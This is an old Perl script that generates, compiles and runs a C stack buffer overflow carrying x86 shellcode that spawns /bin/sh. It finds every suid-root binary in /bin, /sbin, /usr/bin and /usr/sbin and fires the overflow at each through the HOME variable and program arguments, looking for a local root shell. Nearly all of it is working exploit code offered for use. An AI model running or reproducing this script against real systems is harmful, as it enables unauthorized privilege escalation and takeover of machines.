#!/usr/bin/perl
# Probes each suid binary against a standard
# buffer overflow program (both with and without
# the use of environmental variables).
# by bansh33 [www.r00tabega.com]
# some code taken from various overflows by v9 [www.fakehalo.org]
# by default, this runs offsets from -1000 to 1000 in 100's.
# I wrote this recently and have found it *incredibly* useful
# to quickly check any weak binaries.
$offset = 700; #read comments below for looping offsets further down
system("clear");
print "Generating basic buffer overflow..";
open(writecode, ">bof1.c");
print writecode "/\*	usage: ./bof1 [offset] [path] [progname]\n";
print writecode "	this code written mostly by v9 \*/\n";
print writecode <<EOF;
#define DEFAULT_OFFSET 150
static char exec[]=
EOF
print writecode "\"\\xeb\\x24\\x5e\\x8d\\x1e\\x89\\x5e\\x0b\\x33\\xd2\\x89\\x56\\x07\\x89\\x56\\x0f\\xb8\\x1b\\x56\"\n";
print writecode "\"\\x34\\x12\\x35\\x10\\x56\\x34\\x12\\x8d\\x4e\\x0b\\x8b\\xd1\\xcd\\x80\\x33\\xc0\\x40\\xcd\\x80\"\n";
print writecode "\"\\xe8\\xd7\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x01\"\;\n"; # v9 likes hex01 ;)
print writecode <<EOM;
long esp(void){__asm__("movl %esp,%eax");}
int main(int argc,char **argv){
 char bof[241];
 int i,offset;
 long ret;
 if(argc>1){offset=atoi(argv[1]);}
 else{offset=DEFAULT_OFFSET;}
 ret=(esp()-offset);
 printf("return address: 0x%lx, offset: %d.\n",ret,offset);
 for(i=1;i<241;i+=4){*(long *)&bof[i]=ret;}
 for(i=0;i<(237-strlen(exec));i++){*(bof+i)=0x90;}
 memcpy(bof+i,exec,strlen(exec));
 setenv("HOME", bof, 1);	
 execlp(argv[2], argv[3], bof, 0);
}
EOM
close(writecode);
print ".. done.\n";
print "Compiling overflow..";
system("gcc -o bof1 bof1.c");
print ".. the overflow should now be compiled.\n";
# build list of suid (4755) binaries in /usr/bin, /usr/sbin, /bin, and /sbin.
print "Finding suid binaries..";
@suid = `find /usr/bin /usr/sbin /bin /sbin -perm 4755`;
print ".. found.\nStarting tests...\n\n";
foreach $path (@suid) {
chomp($path);
@binary = split(/\//, $path);
$j = 0;
foreach $test (@binary) { $j++; }
$progname = $binary[j-1];
print "Testing $path...\n";
# Here is a simple loop offset routine, commented out by default:
# for ($offset = -1000; $offset < 1000; $offset=+100) {
# print logfile "Output at offset $offset\:\n";
# system("./bof1 $offset $path $progname");
#} 
# Be warned, looping offsets does so for EVERY suid binary
# and can take a VERY long time. Unless you really need to,
# it is recommended to use pre-set offsets.
system("./bof1 $offset $path $progname");
}
print "Finished... cleaning up..\n";
#system("rm -f bof1 bof1.c");
print "done.\n";